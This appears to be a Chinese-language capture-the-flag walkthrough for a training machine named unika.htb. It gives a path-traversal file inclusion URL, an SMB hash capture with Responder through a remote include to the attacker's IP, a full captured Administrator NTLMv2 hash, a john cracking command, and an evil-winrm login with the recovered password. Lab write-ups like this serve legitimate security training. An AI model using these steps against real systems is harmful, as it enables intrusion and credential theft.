第一题
第二题
echo "10.129.99.77 unika.htb" | sudo tee -a /etc/hosts
关于页面跳转的一个技巧
可以修改hosts文件禁止这种跳转,以kali为例,首先编辑/etc/hosts文件,添加一下IP地址和跳转的地址
本题原理
在 /etc/hosts 文件中添加此条目将使浏览器能够将主机名 unika.htb 解析为
相应的 IP 地址 & 从而使浏览器包含 HTTP 标头 Host: unika.htb 在每个
浏览器向该 IP 地址发送的 HTTP 请求,这将使服务器响应
unika.htb 的网页
第三题
第四题
第五题
http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
第六题
第七题
第八题
第九题
第十题
安装Responder
git pull https://github.com/lgandx/Responder
如果git发生报错,fatal: 不是 git 仓库(或者任何父目录):.git
只需要 git init就可以解决
验证 Responder.conf 是否设置为侦听 SMB 请求。
responder -I tun0 开始监听
并访问http://unika.htb/?page=//10.10.15.174/somefile
这的IP是连接openvpn后的,不是机子的IP
成功获取HaX
echo "Administrator::DESKTOP-
H3OF232:1122334455667788:7E0A87A2CCB487AD9B76C7B0AEAEE133:0101000000000000005F3214B534D
801F0E8BB688484C96C0000000002000800420044004F00320001001E00570049004E002D004E0048004500
3800440049003400410053004300510004003400570049004E002D004E00480045003800440049003400410
05300430051002E00420044004F0032002E004C004F00430041004C0003001400420044004F0032002E004C
004F00430041004C0005001400420044004F0032002E004C004F00430041004C0007000800005F3214B534D
801060004000200000008003000300000000000000001000000002000000C2FAF941D04DCECC6A7691EA926
30A77E073056DA8C3F356D47C324C6D6D16F0A0010000000000000000000000000000000000009002000630
06900660073002F00310030002E00310030002E00310034002E00320035000000000000000000" > hash.txt
将haxh导入txt中,准备用john爆破
john --w=/usr/share/wordlists/rockyou.txt.gz hash.txt 开膛手爆破
第十一题
第十二题
最后get shell就好evil-winrm -i 10.129.99.77 -u administrator -p badminton